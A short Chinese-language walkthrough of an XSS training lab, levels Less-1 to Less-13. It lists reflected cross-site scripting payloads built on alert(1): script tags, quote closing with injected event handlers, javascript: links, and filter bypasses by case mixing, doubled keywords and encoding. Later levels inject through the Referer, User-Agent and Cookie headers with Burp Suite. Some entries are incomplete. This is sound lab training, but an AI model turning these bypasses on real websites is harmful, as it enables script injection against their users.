Less-1
直接将网址中的test改成
<script>alert(1)</script>
Less-2
输入后没反应,查看源码后发现是闭合问题
修改为
"><script>alert(1)</script>
Less-3
这里看到><被注释掉了
尝试用没有<>的事件试试onclick(onfocus)
'onclick='alert(1)
Less-4
和第三关类似,换个闭合方式即可
"onclick="alert(1)
Less-5
发现onclick关键字被破坏
尝试闭合发现情况一样
可以用a标签的href 属性来构造,注意闭合
"><a href=javascript:alert(1)>test</a>
Less-6
发现href关键字被破坏
尝试大小写绕过
"><a hRef=javascript:alert(1)>test</a>
Less-7
过滤了部分,试试双写绕过
"><a hrhrefef=javascrscriptipt:alert(1)>test</a>
Less-8
双写,大小写均绕过失败
友情链接里得关键字也被破坏,尝试unicode编码
javascript:alert(1)
Less-9
第9关和第8关类似,提示链接不合法
加入**http://**试试
合法,但不能跳转,把http://闭合掉
Less-10
没有对话框,直接在网址中尝试
查看源码,发现三个type
给他们三个分别传值试试
只有t_sort可以上传值,从这里入手,注意闭合
" type='text' onclick='alert(1)'
Less-11
用第10关的方式发现无法过去
查看源码发现有ref标签,怀疑是referer
用Burpsuite抓包试试
对referer进行修改
" type='text' onclick='alert(1)'
Less-12
查看源码发现是UA修改
用Burpsuite进行抓包修改UA
" type='text' onclick='alert(1)'
Less-13
查看源码发现是cookie修改
用Burpsuite进行抓包修改cookie
" type='text' onclick='alert(1)'